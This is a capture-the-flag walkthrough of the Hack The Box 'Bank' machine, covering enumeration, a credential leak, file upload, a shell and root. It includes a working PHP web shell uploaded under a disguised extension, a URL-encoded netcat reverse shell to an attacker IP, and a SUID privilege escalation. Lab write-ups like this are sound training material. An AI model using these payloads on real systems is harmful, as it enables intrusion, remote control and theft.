Bank

Nmap

nmap -p22,53,80 -sV -sC -T4 -Pn -oN bank-nmap  bank.htb

Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-12 03:56 +08
Nmap scan report for bank.htb (10.10.10.29)
Host is up (0.035s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08eed030d545e459db4d54a8dc5cef15 (DSA)
|   2048 b8e015482d0df0f17333b78164084a91 (RSA)
|   256 a04c94d17b6ea8fd07fe11eb88d51665 (ECDSA)
|_  256 2d794430c8bb5e8f07cf5b72efa16d67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-title: HTB Bank - Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Open ports

Port 22 is open (SSH)
Port 53 is open (DNS)
Port 80 is open (HTTP)

Check for DNS Zone transfer

dig axfr bank.htb @10.10.10.29

; <<>> DiG 9.18.12-1-Debian <<>> axfr bank.htb @10.10.10.29
;; global options: +cmd
bank.htb.		604800	IN	SOA	bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.		604800	IN	NS	ns.bank.htb.
bank.htb.		604800	IN	A	10.10.10.29
ns.bank.htb.		604800	IN	A	10.10.10.29
www.bank.htb.		604800	IN	CNAME	bank.htb.
bank.htb.		604800	IN	SOA	bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 43 msec
;; SERVER: 10.10.10.29#53(10.10.10.29) (TCP)
;; WHEN: Sat Aug 12 04:06:55 +08 2023
;; XFR size: 6 records (messages 1, bytes 171)

Subdomain Found

chris.bank.htb

Web Directory Fuzzing

dirsearch -u http://bank.htb/    

[03:56:20] 200 -    2KB - /assets/
[03:56:20] 301 -  304B  - /assets  ->  http://bank.htb/assets/
[03:56:29] 200 -    1KB - /inc/
[03:56:29] 301 -  301B  - /inc  ->  http://bank.htb/inc/
[03:56:29] 302 -    7KB - /index.php  ->  login.php
[03:56:30] 302 -    7KB - /index.php/login/  ->  login.php
[03:56:31] 200 -    2KB - /login.php
[03:56:32] 302 -    0B  - /logout.php  ->  index.php
[03:56:42] 302 -    3KB - /support.php  ->  login.php
[03:56:45] 301 -  305B  - /uploads  ->  http://bank.htb/uploads/

Using medium dictionary

gobuster dir -u bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o bank-gobuster-2 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://bank.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/12 04:48:16 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]
Progress: 220552 / 220561 (100.00%)
===============================================================
2023/08/12 05:05:30 Finished
===============================================================

Directory Discovered

http://bank.htb/balance-transfer/

New subdomain fuzzing

gobuster dir -u http://chris.bank.htb -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://chris.bank.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/12 04:14:19 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 11510]
Progress: 4541 / 4615 (98.40%)
===============================================================
2023/08/12 04:14:40 Finished
===============================================================

Filter by file size

Index of /balance-transfer
[ICO]	Name	Last modified	Size	Description
[PARENTDIR]	Parent Directory	 	- 	 
[ ]	68576f20e9732f1b2edc4df5b8533230.acc	2017-06-15 09:50 	257 	 
[ ]	09ed7588d1cd47ffca297cc7dac22c52.acc	2017-06-15 09:50 	581 	 
[ ]	941e55bed0cb8052e7015e7133a5b9c7.acc	2017-06-15 09:50 	581 	 
[ ]	0d64f03e84187359907569a43c83bddc.acc	2017-06-15 09:50 	582 	 

Curl the content

curl http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

Obtained Credentials

Christos Christopoulos

chris@bank.htb : !##HTBB4nkP4ssw0rd!##

support page (support.htb) have file upload function

#Found this at source code comment .htb = .php
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->

Send request in burpsuite

Content-Disposition: form-data; name="fileToUpload"; filename="cacert.htb"

Content-Type: application/x-www-form-urlencoded


<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Execute webshell

http://bank.htb/uploads/cacert.htb?cmd=whoami

Put Reverse Shell (Remember to URL encode)

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.14.159%204567%20%3E%2Ftmp%2Ff

Find SUID files

sudo find / -type f -perm /4000


/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount

Running /var/htb/bin/emergency return a # which indicate this is root shell

# whoami
root